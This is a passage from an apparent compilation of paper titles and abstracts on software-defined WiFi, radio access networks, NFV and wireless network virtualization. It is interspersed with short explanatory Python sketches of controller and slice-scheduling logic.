accounting, policy, mobility and interference management, and load balancing. WLANs also exhibit unique challenges. In particular, access point (AP) association decisions are not made by the infrastructure, but by clients. In addition, the association state machine combined with the broadcast nature of the wireless medium requires keeping track of a large amount of state changes. To this end, Odin builds on a light virtual AP abstraction that greatly simplifies client management. Odin does not require any client side modifications and its design supports WPA2 Enterprise. 
With Odin, a network operator can implement enterprise WLAN services as network applications. A prototype implementation demonstrates Odin's feasibility. --- paper_title: A Survey on Software-Defined Network and OpenFlow: From Concept to Implementation paper_content: Software-defined network (SDN) has become one of the most important architectures for the management of largescale complex networks, which may require repolicing or reconfigurations from time to time. SDN achieves easy repolicing by decoupling the control plane from data plane. Thus, the network routers/switches just simply forward packets by following the flow table rules set by the control plane. Currently, OpenFlow is the most popular SDN protocol/standard and has a set of design specifications. Although SDN/OpenFlow is a relatively new area, it has attracted much attention from both academia and industry. In this paper, we will conduct a comprehensive survey of the important topics in SDN/OpenFlow implementation, including the basic concept, applications, language abstraction, controller, virtualization, quality of service, security, and its integration with wireless and optical networks. We will compare the pros and cons of different schemes and discuss the future research trends in this exciting area. This survey can help both industry and academia R&D people to understand the latest progress of SDN/OpenFlow designs. --- paper_title: Towards a scalable and near-sighted control plane architecture for WiFi SDNs paper_content: Not much is known today about how to reap the SDN benefits in WiFi networks-a critical use case given the increasing importance of WiFi networks. This paper presents AeroFlux, a scalable software-defined wireless network, that supports large enterprise and carrier WiFi deployments with low-latency programmatic control of fine-grained WiFi-specific transmission settings. This is achieved through AeroFlux's hierarchical design. We report on an early prototype implementation and evaluation, showing that AeroFlux can significantly reduce control plane traffic. --- paper_title: SoftRAN: software defined radio access network paper_content: An important piece of the cellular network infrastructure is the radio access network (RAN) that provides wide-area wireless connectivity to mobile devices. The fundamental problem the RAN solves is figuring out how best to use and manage limited spectrum to achieve this connectivity. In a dense wireless deployment with mobile nodes and limited spectrum, it becomes a difficult task to allocate radio resources, implement handovers, manage interference, balance load between cells, etc. We argue that LTE's current distributed control plane is suboptimal in achieving the above objective. We propose SoftRAN, a fundamental rethink of the radio access layer. SoftRAN is a software defined centralized control plane for radio access networks that abstracts all base stations in a local geographical area as a virtual big-base station comprised of a central controller and radio elements (individual physical base stations). In defining such an architecture, we create a framework through which a local geographical network can effectively perform load balancing and interference management, as well as maximize throughput, global utility, or any other objective. 
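Odin's central abstraction, described in the abstracts above, is the Light Virtual Access Point: every client gets its own virtual AP whose state (BSSID, association, per-client rules) can be moved between physical APs without the client noticing, which is how mobility management becomes a controller application. The class sketch below only mimics that bookkeeping in plain Python; it performs no real 802.11 signalling and all names are illustrative rather than Odin's actual API.

```python
class LVAP:
    """Per-client light virtual access point: the client-specific state that
    the controller can migrate from one physical AP to another."""
    def __init__(self, client_mac, bssid):
        self.client_mac = client_mac
        self.bssid = bssid          # unique per client, so the client never re-associates
        self.flow_rules = []        # per-client forwarding / transmission settings

class Controller:
    def __init__(self):
        self.lvaps = {}             # client MAC -> LVAP
        self.location = {}          # client MAC -> physical AP hosting its LVAP

    def connect(self, client_mac, phys_ap):
        lvap = LVAP(client_mac, bssid=f"02:00:00:00:{len(self.lvaps):02x}:01")
        self.lvaps[client_mac] = lvap
        self.location[client_mac] = phys_ap
        return lvap

    def handover(self, client_mac, new_ap):
        """Mobility management as an application: move the LVAP, keep its state."""
        old_ap = self.location[client_mac]
        self.location[client_mac] = new_ap
        return f"moved LVAP of {client_mac} from {old_ap} to {new_ap}"

ctrl = Controller()
ctrl.connect("aa:bb:cc:dd:ee:01", phys_ap="AP-1")
print(ctrl.handover("aa:bb:cc:dd:ee:01", new_ap="AP-2"))
```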
--- paper_title: Programmatic orchestration of WiFi networks paper_content: With wireless technologies becoming prevalent at the last hop, today's network operators need to manage WiFi access networks in unison with their wired counterparts. However, the non-uniformity of feature sets in existing solutions and the lack of programmability makes this a challenging task. This paper proposes Odin, an SDN-based solution to bridge this gap. With Odin, we make the following contributions: (i) Light Virtual Access Points (LVAPs), a novel programming abstraction for addressing the IEEE 802.11 protocol stack complexity, (ii) a design and implementation for a software-defined WiFi network architecture based on LVAPs, and (iii) a prototype implementation on top of commodity access point hardware without modifications to the IEEE 802.11 client, making it practical for today's deployments. To highlight the effectiveness of the approach we demonstrate six WiFi network services on top of Odin including load-balancing, mobility management, jammer detection, automatic channel-selection, energy management, and guest policy enforcement. To further foster the development of our framework, the Odin prototype is made publicly available. --- paper_title: AeroFlux: A Near-Sighted Controller Architecture for Software-Defined Wireless Networks paper_content: Applying the concept of SDN to WiFi networks is challenging, since wireless networks feature many peculiarities and knobs that often do not exist in wired networks: obviously, WiFi communicates over a shared medium, with all its implications, e.g., higher packet loss and hidden or exposed terminals. Moreover, wireless links can be operated in a number of different regimes, e.g., transmission rate and power settings can be adjusted, RTS/CTS mechanisms can be used. Indeed, due to the non-stationary characteristic of the wireless channel, permanently adjusting settings such as transmission rate and power is crucial for the performance of WiFi networks and brings significant benefits in the service quality, e.g., through reducing the packet loss probability. Today’s rate and power control is mainly done on the WiFi device itself. But it is rarely optimized to the application-layer demands and their diverse traffic requirements, e.g., their individual sensitivity to packet loss or jitter. Therefore, if SDN for wireless can provide mechanisms to control the WiFi-specific transmission settings on a per-slice, per-client, and per-flow level, traffic and application-aware optimizations are feasible. This however requires that controllers frequently collect link characteristics and, accordingly, adjust transmission settings in a timely manner. As a reference, the standard rate control mechanism in the Linux kernel adjusts the transmission rate on a wireless link based on transmission success probability statistics every 100 ms. Leaving rate control (and power control accordingly) to a centralized controller comes with a risk of overloading the control plane, or of adding too much latency, while there is limited benefit in maintaining these statistics globally. For instance, the coherence time (also a function of the client mobility) can easily exceed the expected time of the successful transmission of multiple data frames [2], rendering optimized control difficult. In this paper, we suggest a 2-tiered approach for the design of a wireless SDN control plane. 
Our design, called AeroFlux, handles frequent, localized events close to where they originate, i.e., close to the data plane, by relying on Near-Sighted Controllers (NSC) [3, 4, 7]. Global events, which require a broader picture of the network's state, are handled by the Global Controller (GC). More specifically, the GC takes care of network functions that require global visibility, such as mobility management and load balancing, whereas NSCs control per-client or per-flow transmission settings such as rate and power based on transmission status feedback information exported by the Access Points (AP), which includes the rates for best throughput and best transmission probability. Put differently, we enable the global controller to offload latency-critical or high-load tasks from the tier-1 control plane to the NSCs. This reduces the load on the GC and lowers the latency of critical control plane operations. As a result, with AeroFlux, we realize a scalable wireless SDN architecture which can support large enterprise and carrier WiFi deployments with low-latency programmatic control of fine-grained WiFi-specific transmission settings. The AeroFlux design introduces a set of new trade-offs and optimization opportunities which allow for advancements in the use of the shared wireless medium, and, as a result, in the user's quality of experience. For instance, our prototype's per-flow control allows application-aware service differentiation by prioritizing multimedia streams (§2). Another key feature of AeroFlux is that it does not require modifications to today's hardware and works on top of commodity WiFi equipment. The AeroFlux Architecture: AeroFlux uses a 2-tiered control plane: the Global Control plane GC and the Near-Sighted Control plane NSC. Figure 1 depicts the high-level interactions of the architecture's building blocks. The GC is logically centralized, e.g., a set of redundant controllers deployed in data centers, whereas the NSCs are located closer to where they are needed, e.g., close to the wireless APs. On the APs runs a Radio Agent (RA), which hosts the Light Virtual Access Points (LVAPs) [6] that abstract the specifics of the 802.11 protocol, such as association and authentication state. Furthermore, LVAPs store per-client OpenFlow and WiFi Datapath Transmission (WDTX) rules. In the following, we describe the different elements in more detail. Global Controller (GC): The global controller handles events which are not time-critical [7] or events belonging to inherently global tasks [4]. Examples include: authentication, wide-area mobility management, global policy verification (including loop-free forwarding sets), client load balancing, and applications for intrusion detection or network monitoring. In addition, the global controller is best suited to man- --- paper_title: Cloud-RAN: Innovative radio access network architecture paper_content: The recent penetration of SDR (software-defined radio) technology into mobile systems of the new generation, as well as increasing throughput demands in the radio access network (RAN), are the main development engines of a new paradigm in the radio access network world, better known as Cloud-Radio Access Network (C-RAN). This innovative architecture, whose main proponent among telecom companies is China Mobile, should significantly decrease the business costs of telcos, mainly on a long-term basis, and also enable higher resource utilization as well as faster and more flexible development of radio access networks following the IT concept of Cloud Computing.
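The AeroFlux entries above split the control plane into a Global Controller for non-time-critical, network-wide tasks and Near-Sighted Controllers for latency-critical per-client and per-flow settings such as rate and power. A minimal sketch of such a two-tier event dispatch is shown below; the event names and the classification rule are illustrative assumptions, not AeroFlux's implementation.

```python
# Illustrative two-tier dispatch in the spirit of AeroFlux: latency-critical,
# localized events go to the near-sighted controller co-located with the AP,
# everything else goes to the logically centralized global controller.
# Event names and the classification rule are assumptions for illustration.
GLOBAL_EVENTS = {"auth_request", "mobility_handoff", "policy_update", "load_report"}
LOCAL_EVENTS = {"tx_status_feedback", "rate_adapt", "power_adapt"}

def dispatch(event_type: str, ap_id: str) -> str:
    if event_type in LOCAL_EVENTS:
        return f"NSC({ap_id})"      # handled close to the data plane, low latency
    if event_type in GLOBAL_EVENTS:
        return "GC"                 # needs network-wide visibility
    return "GC"                     # default: escalate unknown events conservatively

for ev in ("tx_status_feedback", "mobility_handoff"):
    print(ev, "->", dispatch(ev, ap_id="ap-17"))
```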
Although the architecture itself, applied to this field, is quite revolutionary compared to the present one, its realization would be based on an optimal combination of existing technologies that would have to be adjusted to the system requirements of, mainly, LTE and LTE-Advanced systems. Even though, theoretically, the reviewed architecture provides a number of improvements, certain problems must be solved for its wider acceptance and implementation, owing to the current capabilities of SDR technology and optical infrastructure. This paper presents a brief overview of the pros and cons of this architecture as well as an estimate of further progress in this field. It also presents an overview of all known techniques for realizing a system capable of supporting a C-RAN network. We explored all the external factors that affect the radio access network and drew our own conclusions. --- paper_title: CloudMAC — An OpenFlow based architecture for 802.11 MAC layer processing in the cloud paper_content: IEEE 802.11 WLANs are a very important technology for providing high-speed wireless Internet access. Especially at airports, university campuses or in city centers, WLAN coverage is becoming ubiquitous, leading to deployments of hundreds or thousands of Access Points (AP). Managing and configuring such large WLAN deployments is a challenge. Current WLAN management protocols such as CAPWAP are hard to extend with new functionality. In this paper, we present CloudMAC, a novel architecture for enterprise or carrier grade WLAN systems. By partially offloading the MAC layer processing to virtual machines provided by cloud services and by integrating our architecture with OpenFlow, a software defined networking approach, we achieve a new level of flexibility and reconfigurability. In CloudMAC, APs just forward MAC frames between virtual APs and IEEE 802.11 stations. The processing of MAC layer frames as well as the creation of management frames is handled at the virtual APs, while the binding between the virtual APs and the physical APs is managed using OpenFlow. The testbed evaluation shows that CloudMAC achieves similar performance to normal WLANs, but allows novel services to be implemented easily in high-level programming languages. The paper presents a case study which shows that dynamically switching off APs to save energy can be performed seamlessly with CloudMAC, while a traditional WLAN architecture causes large interruptions for users. --- paper_title: NFV: State of the Art, Challenges and Implementation in Next Generation Mobile Networks (vEPC) paper_content: As mobile network users look forward to the connectivity speeds of 5G networks, service providers are facing challenges in complying with connectivity demands without substantial financial investments. Network function virtualization (NFV) is introduced as a new methodology that offers a way out of this bottleneck. NFV is poised to change the core structure of telecommunications infrastructure to be more cost-efficient. In this article, we introduce an NFV framework, and discuss the challenges and requirements of its use in mobile networks. In particular, an NFV framework in the virtual environment is proposed. Moreover, in order to reduce signaling traffic and achieve better performance, this article proposes a criterion to bundle multiple functions of a virtualized evolved packet core in a single physical device or a group of adjacent devices. The analysis shows that the proposed grouping can reduce the network control traffic by 70 percent.
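The vEPC entry above proposes bundling virtualized EPC functions onto the same physical device to cut control-plane signaling. The abstract does not state the exact criterion, so the sketch below only illustrates the general idea with a hypothetical signaling matrix and a greedy pairing rule: co-locate the pair of functions that exchange the most signaling, so that this traffic never leaves the device.

```python
# Hypothetical illustration of grouping virtual EPC functions to reduce external
# signaling; the traffic figures and the greedy pairing rule are assumptions,
# not the criterion proposed in the paper.
signaling_per_s = {          # messages/s exchanged between vEPC functions
    ("MME", "SGW"): 1200,
    ("SGW", "PGW"): 900,
    ("MME", "HSS"): 300,
    ("MME", "PGW"): 100,
}

def best_bundle(traffic):
    """Pick the function pair whose co-location hides the most signaling traffic."""
    pair = max(traffic, key=traffic.get)
    return pair, traffic[pair]

pair, saved = best_bundle(signaling_per_s)
print(f"co-locate {pair}, keeping {saved} msg/s off the network")
```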
--- paper_title: Network Function Virtualization: State-of-the-art and Research Challenges paper_content: Network function virtualization (NFV) has drawn significant attention from both industry and academia as an important shift in telecommunication service provisioning. By decoupling network functions (NFs) from the physical devices on which they run, NFV has the potential to lead to significant reductions in operating expenses (OPEX) and capital expenses (CAPEX) and facilitate the deployment of new services with increased agility and faster time-to-value. The NFV paradigm is still in its infancy and there is a large spectrum of opportunities for the research community to develop new architectures, systems and applications, and to evaluate alternatives and trade-offs in developing technologies for its successful deployment. In this paper, after discussing NFV and its relationship with complementary fields of software defined networking (SDN) and cloud computing, we survey the state-of-the-art in NFV, and identify promising research directions in this area. We also overview key NFV projects, standardization efforts, early implementations, use cases, and commercial products. --- paper_title: Wireless Network Virtualization: A Survey, Some Research Issues and Challenges paper_content: Since wireless network virtualization enables abstraction and sharing of infrastructure and radio spectrum resources, the overall expenses of wireless network deployment and operation can be reduced significantly. Moreover, wireless network virtualization can provide easier migration to newer products or technologies by isolating part of the network. Despite the potential vision of wireless network virtualization, several significant research challenges remain to be addressed before widespread deployment of wireless network virtualization, including isolation, control signaling, resource discovery and allocation, mobility management, network management and operation, and security as well as non-technical issues such as governance regulations, etc. In this paper, we provide a brief survey on some of the works that have already been done to achieve wireless network virtualization, and discuss some research issues and challenges. We identify several important aspects of wireless network virtualization: overview, motivations, framework, performance metrics, enabling technologies, and challenges. Finally, we explore some broader perspectives in realizing wireless network virtualization. --- paper_title: Virtualization of Multi-Cell 802.11 Networks: Association and Airtime Control paper_content: This paper investigates the virtualization and optimization of a multi-cell WLAN. We consider the station (STA)-access point (AP) association and airtime control for virtualized 802.11 networks to provide service customization and fairness across multiple internet service providers (ISPs) sharing the common physical infrastructure and network capacity. More specifically, an optimization problem is formulated on the STAs transmission probabilities to maximize the overall network throughput, while providing airtime usage guarantees for the ISPs. Subsequently, an algorithm to reach the optimal solution is developed by applying monomial approximation and geometric programming iteratively. Based on the proposed three-dimensional Markov-chain model of the enhanced distributed channel access (EDCA) protocol, the detailed implementation of the optimal transmission probability is also discussed. 
The accuracy of the proposed Markov-chain model and the performance of the developed association and airtime control scheme are evaluated through numerical results. --- paper_title: Current trends and perspectives in wireless virtualization paper_content: The objective of this paper is to survey and compare recent works in the field of wireless virtualization in order to identify potential applications, common trends and future research directions. First, this paper briefly summarizes different wireless virtualization architectures as well as both enabling and enabled technologies related to wireless virtualization. Then, this paper proposes a wireless virtualization classification based on the type of virtualized resources and the depth of slicing. The three main perspectives identified are data and flow-based perspective, protocol-based perspective and spectrum-based perspective. A hypothetical ecosystem scenario of a future virtualized wireless infrastructure in which these perspectives coexist is explored. Finally, the challenges and requirements of a sustainable wireless virtualization framework are discussed. --- paper_title: Future Mobile Communications: Lte Optimization and Mobile Network Virtualization paper_content: The key to a successful future mobile communication system lies in the design of its radio scheduler. One of the key challenges of the radio scheduler is how to provide the right balance between Quality of Service (QoS) guarantees and the overall system performance. Yasir Zaki proposes innovative solutions for the design of the Long Term Evolution (LTE) radio scheduler and presents several LTE radio scheduler analytical models that can be used as efficient tools for radio dimensioning. The author also introduces a novel wireless network virtualization framework and highlights the potential gains of using this framework for the future network operators. This framework enables the operators to share their resources and reduce their cost, thus achieving a better overall system performance and radio resource utilization. --- paper_title: Resource allocation for broadband networks paper_content: The author suggests the use of congestion measures at the packet level, the burst level, and the call level to evaluate congestion for integrated traffic. These measures result from the fact that communication terminals can often be characterized in terms of call level, burst level, and packet level statistics. They can be used for the purpose of bandwidth allocation at these levels, virtually emulating the functions of circuit switching, fast circuit switching, and fast packet switching, respectively. Various methodologies are described for evaluating blocking probabilities at these levels. The analysis sheds light on traffic engineering issues such as appropriate link load, traffic integration, trunk group and switch sizing, and bandwidth reservation criteria for bursty services. > --- paper_title: NVS: A Substrate for Virtualizing Wireless Resources in Cellular Networks paper_content: This paper describes the design and implementation of a network virtualization substrate (NVS ) for effective virtualization of wireless resources in cellular networks. Virtualization fosters the realization of several interesting deployment scenarios such as customized virtual networks, virtual services, and wide-area corporate networks, with diverse performance objectives. 
In virtualizing a base station's uplink and downlink resources into slices, NVS meets three key requirements (isolation, customization, and efficient resource utilization) using two novel features: 1) NVS introduces a provably optimal slice scheduler that allows the existence of slices with bandwidth-based and resource-based reservations simultaneously; and 2) NVS includes a generic framework for efficiently enabling customized flow scheduling within the base station on a per-slice basis. Through a prototype implementation and detailed evaluation on a WiMAX testbed, we demonstrate the efficacy of NVS. For instance, we show for both downlink and uplink directions that NVS can run different flow schedulers in different slices, run different slices simultaneously with different types of reservations, and perform slice-specific application optimizations for providing customized services. --- paper_title: LTE wireless virtualization and spectrum management paper_content: Many research initiatives have started looking into Future Internet solutions in order to satisfy the ever increasing requirements on the Internet and also to cope with the challenges existing in the current one. Some are proposing further enhancements while others are proposing completely new approaches. Network Virtualization is one solution that is able to combine these approaches and, therefore, could play a central role in the Future Internet. It will enable the existence of multiple virtual networks on a common infrastructure even with different network architectures. Network Virtualization means setting up a network composed of individual virtualized network components, such as nodes, links, and routers. Mobility will remain a major requirement, which means that wireless resources also need to be virtualized. In this paper the Long Term Evolution (LTE) was chosen as a case study to extend Network Virtualization into the wireless area. --- paper_title: Resource allocation and cross-layer control in wireless networks paper_content: Information flow in a telecommunication network is accomplished through the interaction of mechanisms at various design layers with the end goal of supporting the information exchange needs of the applications. In wireless networks in particular, the different layers interact in a nontrivial manner in order to support information transfer. In this text we will present abstract models that capture the cross-layer interaction from the physical to transport layer in wireless network architectures including cellular, ad-hoc and sensor networks as well as hybrid wireless-wireline. The model allows for arbitrary network topologies as well as traffic forwarding modes, including datagrams and virtual circuits. Furthermore the time varying nature of a wireless network, due either to fading channels or to changing connectivity due to mobility, is adequately captured in our model to allow for state dependent network control policies. Quantitative performance measures that capture the quality of service requirements in these systems depending on the supported applications are discussed, including throughput maximization, energy consumption minimization, rate utility function maximization as well as general performance functionals. Cross-layer control algorithms with optimal or suboptimal performance with respect to the above measures are presented and analyzed. A detailed exposition of the related analysis and design techniques is provided.
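The NVS entry above lets slices with bandwidth-based (bits/s) and resource-based (fraction of radio resources) reservations coexist under one scheduler. The sketch below is a simple deficit-style heuristic that captures the idea of serving whichever slice is furthest behind its reservation; it is an illustrative assumption, not NVS's provably optimal scheduler.

```python
# Illustrative deficit-style slice picker: bandwidth slices are owed bits over
# time, resource slices are owed a fraction of radio resources; serve whichever
# slice is furthest behind its reservation. Not NVS's actual algorithm.
from dataclasses import dataclass

@dataclass
class Slice:
    name: str
    kind: str            # "bandwidth" or "resource"
    reservation: float   # bits/s if kind == "bandwidth", fraction [0, 1] otherwise
    served_bits: float = 0.0
    served_fraction: float = 0.0

def pick_slice(slices, elapsed_s):
    def normalized_deficit(s):
        if s.kind == "bandwidth":
            owed = s.reservation * elapsed_s           # bits owed so far
            return (owed - s.served_bits) / max(owed, 1.0)
        return (s.reservation - s.served_fraction) / max(s.reservation, 1e-9)
    return max(slices, key=normalized_deficit)

slices = [Slice("voip-slice", "bandwidth", 2e6),        # 2 Mb/s reservation
          Slice("mvno-A", "resource", 0.3)]             # 30% of the resources
print(pick_slice(slices, elapsed_s=1.0).name)
```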
--- paper_title: LTE Wireless Network Virtualization: Dynamic Slicing via Flexible Scheduling paper_content: The successful virtualization of wireless access networks is strongly affected by the way in which radio resources are managed. The Infrastructure Provider (InP) is required to deploy efficient and flexible scheduling techniques to dynamically allocate the resources for the users associated with different Service Providers (SPs). Service contracts with different SPs and fairness among their users are crucial to the success of the virtualization scheme deployed by the InP. In this paper we develop an efficient resource allocation scheme to allocate the radio resource blocks in LTE networks. The scheme keeps track of the service contracts with the SPs and also the fairness requirements between cell-center users and cell-edge users. Also the scheme allows the flexible definition of fairness requirements for different SPs. The performance of the proposed schemes is evaluated and the results show that the proposed low-complexity scheme is very efficient in terms of computation time and its performance in terms of sum rate is close to the results due to the relaxed solution and coordinate search algorithm. --- paper_title: Investigation of Network Virtualization and Load Balancing Techniques in LTE Networks paper_content: Mobile Network Virtualization (NV) is an emerging technique which has drawn increasingly research attention. Network Virtualization enables multiple network operators to share a common infrastructure (including core network, transport network and access network) so as to reduce the investment capital while improving the overall performance at the same time. This is achieved by exploring the multiplexing gain. Similarly, Load Balancing (LB) is a well-known mechanism used in mobile networks to offload excessive traffic from high-load cells (hot spots) to low-load ones within one network operator. This paper aims at investigating the potential gain of applying NV in LTE (Long Term Evolution) networks and compares it with the LB scheme gain. In this paper, we propose an LTE virtualization framework (that enables spectrum sharing) and a dynamic load balancing scheme for multi-eNB and multi-VO (Virtual Operator) systems. We compare the performance gain of both schemes for different applications, e.g. VoIP, video, HTTP and FTP. We also investigate the parameterization of both schemes, e.g. sharing intervals, LB intervals and safety margins, in order to find the optimal parameter settings. The presented results show that the LTE networks can benefit from both NV and LB techniques. --- paper_title: NVS: A Substrate for Virtualizing Wireless Resources in Cellular Networks paper_content: This paper describes the design and implementation of a network virtualization substrate (NVS ) for effective virtualization of wireless resources in cellular networks. Virtualization fosters the realization of several interesting deployment scenarios such as customized virtual networks, virtual services, and wide-area corporate networks, with diverse performance objectives. 
In virtualizing a base station's uplink and downlink resources into slices, NVS meets three key requirements (isolation, customization, and efficient resource utilization) using two novel features: 1) NVS introduces a provably optimal slice scheduler that allows the existence of slices with bandwidth-based and resource-based reservations simultaneously; and 2) NVS includes a generic framework for efficiently enabling customized flow scheduling within the base station on a per-slice basis. Through a prototype implementation and detailed evaluation on a WiMAX testbed, we demonstrate the efficacy of NVS. For instance, we show for both downlink and uplink directions that NVS can run different flow schedulers in different slices, run different slices simultaneously with different types of reservations, and perform slice-specific application optimizations for providing customized services. --- paper_title: LTE wireless virtualization and spectrum management paper_content: Many research initiatives have started looking into Future Internet solutions in order to satisfy the ever increasing requirements on the Internet and also to cope with the challenges existing in the current one. Some are proposing further enhancements while others are proposing completely new approaches. Network Virtualization is one solution that is able to combine these approaches and, therefore, could play a central role in the Future Internet. It will enable the existence of multiple virtual networks on a common infrastructure even with different network architectures. Network Virtualization means setting up a network composed of individual virtualized network components, such as nodes, links, and routers. Mobility will remain a major requirement, which means that wireless resources also need to be virtualized. In this paper the Long Term Evolution (LTE) was chosen as a case study to extend Network Virtualization into the wireless area. --- paper_title: CellSlice: Cellular wireless resource slicing for active RAN sharing paper_content: We present the design and implementation of CellSlice, a novel system for slicing wireless resources in a cellular network for effective Radio Access Network (RAN) sharing. CellSlice is a gateway-level solution that achieves the slicing without modifying the basestations' MAC schedulers, thereby significantly reducing the barrier for its adoption. Achieving slicing with a gateway-level solution is challenging, however, since resource scheduling decisions occur at the basestations at fine timescales, and these decisions are not visible at the gateways. In the uplink direction, CellSlice overcomes the challenge by indirectly constraining the uplink scheduler's decisions using a simple feedback-based adaptation algorithm. For downlink, we build on the technique used by NVS, a native basestation virtualization solution, and show that effective downlink slicing can be easily achieved without modifying basestation schedulers. We instantiate a prototype of CellSlice on a Picochip WiMAX testbed. Through both prototype evaluation and simulations, we demonstrate that CellSlice's performance for both remote uplink and remote downlink slicing is close to that of NVS. CellSlice's design is access-technology independent, and hence can be equally applicable to LTE, LTE-Advanced and WiMAX networks.
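The CellSlice entry above cannot touch the base station's uplink scheduler, so it steers each slice indirectly from the gateway with a feedback-based adaptation of per-slice constraints. The following is a minimal sketch of the shape of such a loop under assumed gains and bounds; it is not the paper's actual algorithm.

```python
# Toy gateway-side feedback loop in the spirit of CellSlice's uplink slicing:
# nudge a per-slice uplink cap toward the slice's reservation based on measured
# throughput. Gain, bounds, and the update rule are illustrative assumptions.
def update_uplink_cap(cap_bps, measured_bps, reserved_bps,
                      gain=0.5, floor_bps=100e3, ceil_bps=50e6):
    error = reserved_bps - measured_bps        # > 0: slice is under-served
    new_cap = cap_bps + gain * error           # loosen (or tighten) the cap
    return min(max(new_cap, floor_bps), ceil_bps)

cap = 5e6                                      # start at 5 Mb/s
for measured in (3.0e6, 4.2e6, 5.4e6):         # successive throughput samples
    cap = update_uplink_cap(cap, measured, reserved_bps=5e6)
    print(f"new cap: {cap / 1e6:.2f} Mb/s")
```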
--- paper_title: A Dynamic Embedding Algorithm for Wireless Network Virtualization paper_content: Wireless network virtualization enables multiple virtual wireless networks to coexist on shared physical infrastructure. However, one of the main challenges is the problem of assigning the physical resources to virtual networks in an efficient manner. Although some work has been done on solving the embedding problem for wireless networks, few solutions are applicable to dynamic networks with changing traffic patterns. In this paper we propose a dynamic greedy embedding algorithm for wireless virtualization. Virtual networks can be re-embedded dynamically using this algorithm, enabling increased resource usage and lower rejection rates. We compare the dynamic greedy algorithm to a static embedding algorithm and also to its dynamic version. We show that the dynamic algorithms provide increased performance to previous methods using simulated traffic. In addition we formulate the embedding problem with multiple priority levels for the static and dynamic case. --- paper_title: Virtual basestation: architecture for an open shared WiMAX framework paper_content: This paper presents the architecture and performance evaluation of a virtualized wide-area "4G" cellular wireless network. Specifically, it addresses the challenges of virtualization of resources in a cellular base station to enable shared use by multiple independent slice users (experimenters or mobile virtual network operators), each with possibly distinct flow types and network layer protocols. The proposed virtual basestation architecture is based on an external substrate which uses a layer-2 switched datapath, and an arbitrated control path to the WiMAX basestation. The framework implements virtualization of base station's radio resources to achieve isolation between multiple virtual networks. An algorithm for weighted fair sharing among multiple slices based on an airtime fairness metric has been implemented for the first release. Preliminary experimental results from the virtual basestation prototype are given, demonstrating mobile network performance, isolation across slices with different flow types, and custom flow scheduling capabilities. --- paper_title: Karnaugh-map like online embedding algorithm of wireless virtualization paper_content: Wireless virtualization enables multiple concurrent wireless networks running on a shared wireless substrate to support different services (e.g. multimedia, VoIP). A fundamental challenge in wireless virtualization is how to efficiently assign wireless resource to virtual networks (VNs), i.e. embedding problem. However, so far there are few research results related to the embedding problems of wireless virtualization. This paper focuses on two important goals: (1) the embedding algorithm should handle online virtual network requests; (2) an efficient embedding algorithm is needed. Inspired from karnaugh-map, we present a karnaugh-map-like online embedding algorithm of wireless virtualization, which includes: online scheduling method and karnaugh-map-like embedding algorithm. Evaluation results show that our algorithm has better performance. To the best of authors' knowledge, it is not only the first detailed algorithm on embedding problem of wireless virtualization, but also the first algorithm handling the online requests of wireless virtualization. 
--- paper_title: VNTS: A Virtual Network Traffic Shaper for Air Time Fairness in 802.16e Systems paper_content: The 802.16e standard for broadband wireless access mandates the presence of QoS classes, but does not specify guidelines for the scheduler implementation or mechanisms to ensure air time fairness. Our study demonstrates the feasibility of controlling downlink airtime fairness for slices while running above a proprietary WiMAX basestation (BS) scheduler. We design and implement a virtualized infrastructure that allows users to obtain at least an allocated percentage of BS resources in the presence of saturation and link degradation. Using Kernel virtual machines for creating slices and Click modular router for implementing the virtual network traffic shaping engine we show that it is possible to adaptively control slice usage for downlink traffic on a WiMAX Basestation. The fairness index and coupling coefficient show an improvement of up to 42%, and 73% with preliminary indoor walking mobility experiments. Outdoor vehicular measurements show an improvement of up to 27%, and 70% with the fairness index and coupling coefficient respectively --- paper_title: CellSlice: Cellular wireless resource slicing for active RAN sharing paper_content: We present the design and implementation of Cell-Slice, a novel system for slicing wireless resources in a cellular network for effective Radio Access Network (RAN) sharing. CellSlice is a gateway-level solution that achieves the slicing without modifying the basestations' MAC schedulers, thereby significantly reducing the barrier for its adoption. Achieving slicing with a gateway-level solution is challenging, however, since resource scheduling decisions occur at the basestations at fine timescales, and these decisions are not visible at the gateways. In the uplink direction, CellSlice overcomes the challenge by indirectly constraining the uplink scheduler's decisions using a simple feedback-based adaptation algorithm. For downlink, we build on the technique used by NVS, a native basestation virtualization solution, and show that effective downlink slicing can be easily achieved without modifying basestation schedulers. We instantiate a prototype of CellSlice on a Picochip WiMAX testbed. Through both prototype evaluation and simulations, we demonstrate that CellSlice's performance for both remote uplink and remote downlink slicing is close to that of NVS. CellSlice's design is access-technology independent, and hence can be equally applicable to LTE, LTE-Advanced and WiMAX networks. --- paper_title: ViFi: Virtualizing WLAN using Commodity Hardware paper_content: We consider an architecture in which the same WiFi infrastructure can be dynamically shared among multiple operators. Our system, ViFi, virtualizes WLAN resources, allowing for controlled sharing of both the uplink and downlink bandwidth. ViFi operates with stock 802.11 clients, and can be implemented entirely as a software add-on for commodity 802.11 APs. ViFi puts users (customers) of different operators in separate groups, each creating a virtual WLAN. ViFi guarantees proportional fair share of channel access time at group level, and isolates traffic between groups. The key technical contribution of ViFi is a useful form of virtualization without requiring changes to the underlying WiFi protocol. --- paper_title: Virtualization of Multi-Cell 802.11 Networks: Association and Airtime Control paper_content: This paper investigates the virtualization and optimization of a multi-cell WLAN. 
We consider the station (STA)-access point (AP) association and airtime control for virtualized 802.11 networks to provide service customization and fairness across multiple internet service providers (ISPs) sharing the common physical infrastructure and network capacity. More specifically, an optimization problem is formulated on the STAs transmission probabilities to maximize the overall network throughput, while providing airtime usage guarantees for the ISPs. Subsequently, an algorithm to reach the optimal solution is developed by applying monomial approximation and geometric programming iteratively. Based on the proposed three-dimensional Markov-chain model of the enhanced distributed channel access (EDCA) protocol, the detailed implementation of the optimal transmission probability is also discussed. The accuracy of the proposed Markov-chain model and the performance of the developed association and airtime control scheme are evaluated through numerical results. --- paper_title: Wireless virtualization on commodity 802.11 hardware paper_content: In this paper we describe specific challenges in virtualizing a wireless network and multiple strategies to address them. Among different possible wireless virtualization strategies, our current work in this domain is focussed on a Time-Division Multiplexing (TDM) approach. Hence, we we present our experiences in the design and implementation of such TDM-based wireless virtualization. Our wireless virtualization system is specifically targeted for multiplexing experiments on a large-scale 802.11 wireless testbed facility. --- paper_title: Providing Throughput and Fairness Guarantees in Virtualized WLANs through Control Theory paper_content: With the increasing demand for mobile Internet access, WLAN virtualization is becoming a promising solution for sharing wireless infrastructure among multiple service providers. Unfortunately, few mechanisms have been devised to tackle this problem and the existing approaches fail in optimizing the limited bandwidth and providing virtual networks with fairness guarantees. In this paper, we propose a novel algorithm based on control theory to configure the virtual WLANs with the goal 